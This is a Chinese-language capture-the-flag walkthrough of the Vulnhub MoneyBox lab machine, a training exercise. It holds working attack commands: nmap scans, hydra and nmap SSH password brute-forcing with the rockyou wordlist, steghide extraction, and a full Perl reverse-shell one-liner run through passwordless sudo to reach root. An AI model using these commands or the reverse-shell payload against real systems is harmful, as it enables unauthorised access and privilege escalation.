Vulnhub-Moneybox
Description
本次靶机来自vulnhub MONEYBOX 1 。靶机中存在3个flag,本次目标是拿到这3个flag,废话不多说开始吧。
扫描与服务识别
靶机与Kali处在同一网段,通过二层扫描(arp-scan)同网段的存活IP
sudo arp-scan -I eth0 -l # -I 网卡 -l 本地网络
通过判断,192.168.54.250为靶机地址。
扫描该靶机的开放端口
sudo nmap -p- 192.168.54.250
发现21,22,80端口,对这些端口进行服务识别
sudo nmap -p21,22,80 -sV 192.168.54.250
发现了目标开放了ftp服务,ssh以及web服务
漏洞扫描
使用nmap利用默认脚本扫描是否存在服务漏洞
sudo nmap -p21 -sC 192.168.54.250 # -sC 默认脚本
扫描发现ftp存在匿名登陆漏洞
ssh和http服务没有发现什么异常
整理分析
匿名用户登陆
先利用发现的匿名登陆漏洞
用账号密码anonymous/anonymous登陆成功,并且发现一张图片trytofind.jpg
将图片下载至本地(图片可能藏着某些信息)
访问web服务
查看源码发现,没有发现什么信息
目录爆破
爆破网站目录(dirsearch需要安装)
dirsearch -u http://192.168.54.250/
发现一个博客页面
根据页面内容,在页面源码中发现提示,存在秘密目录S3cr3t-T3xt
访问目录
在页面源码中发现一个密钥3xtr4ctd4t4
图片隐写
通过strings命令查看图片中是否有什么明显的字符信息
strings trytofind.jpg
虽然没有直接看到明显信息,但看到异常字符,客图片里插入什么
用steghide查看插入的数据
steghide info trytofind.jpg
发现需要密码,用之前的获得的密钥3xtr4ctd4t4尝试
成功,发现存在一个data.txt文件
提取信息
steghide extract -sf trytofind.jpg
ssh爆破
查看data文件
发现几个关键字眼,人名renu,密码很弱,可以判断renu可能是一个账号且存在弱口令问题,可以进行暴力破解
首先先找一个字典(/usr/share/wordlists/rockyou.txt.gz)
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
这里可以用nmap的ssh爆破脚本,也可以用hydra
nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.54.250
使用hydra
hydra -l renu -P rockyou.txt 192.168.54.250 ssh
破解成功
账号密码为renu/987654321
获取Flag
ssh连接到renu账号
查看目录
成功获得第一个Flag
尝试sudo到root用户
由于不在超级用户组,权限不够
查看历史命令history
history
发现一个lily用户,并且有通过ssh登陆的痕迹
进入home目录里的lily用户文件,发现第二个Flag
进入lily下的.ssh文件夹和renu的.ssh文件夹
发现lily的authorized_keys存在renu的公钥,因此renu可以直接通过ssh登陆到lily账号。
查看lily用户的权限信息
发现lily用户可以在不使用密码的情况下使用Perl程序
在kali上监听3334端口
nc -nvlp 3334
利用perl程序运行反弹shell
sudo perl -e 'use Socket;$i="192.168.54.103";$p=3334;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
连接成功,获得root权限
进入root根目录
发现.root.txt文件,获得最后一个Flag
Vulnhub-Moneybox相关推荐
- 看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox: 1
Vulnhub靶机MoneyBox: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP匿名登入: ...
- Vulnhub实战-MoneyBox
描述: 主机探测: 端口扫描: nmap -T4 -A -v 192.168.199.134 靶机开放了4个端口,21,22,80,其中21端口可以无验证登录. 使用msf扫描一下,是否可以匿名登录. ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- 靶场练习第二十二天~vulnhub靶场之Momentum-2
一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...
最新文章
- Oracle 10g新增DROP DATABASE命令
- origin+matlab基础绘图
- Vimium - 让Chrome高效工作的神器
- Java之基础(1) - 编程中“为了性能”尽量要做到的一些地方
- 推荐5款学Java开发的必备工具
- 辅助判卷程序项目的扩展--自动出题
- 图解 IDEA 中 springboot 项目 MyBatis Generator 逆向生成实体类及 mapper 配置文件
- java imagemagick 接口_ImageMagick安装及使用教程
- 【心情】bjdldrz
- 任务调度(三)——Timer的替代品ScheduledExecutorService简单介绍
- git 查看自己的用户名和邮箱
- Ehcahe spring
- 办公自动化:PDF文件合并器,将多个PDF文件进行合并...
- python 关联矩阵_创建关联矩阵
- springboot 网页聊天室
- 液晶屏背光LED驱动电路设计参考
- 为文字添加下划线和中划线
- 594. Longest Harmonious Subsequence
- java Base64加密解密中文乱码处理
- 360加速插件谷歌字体服务停止运行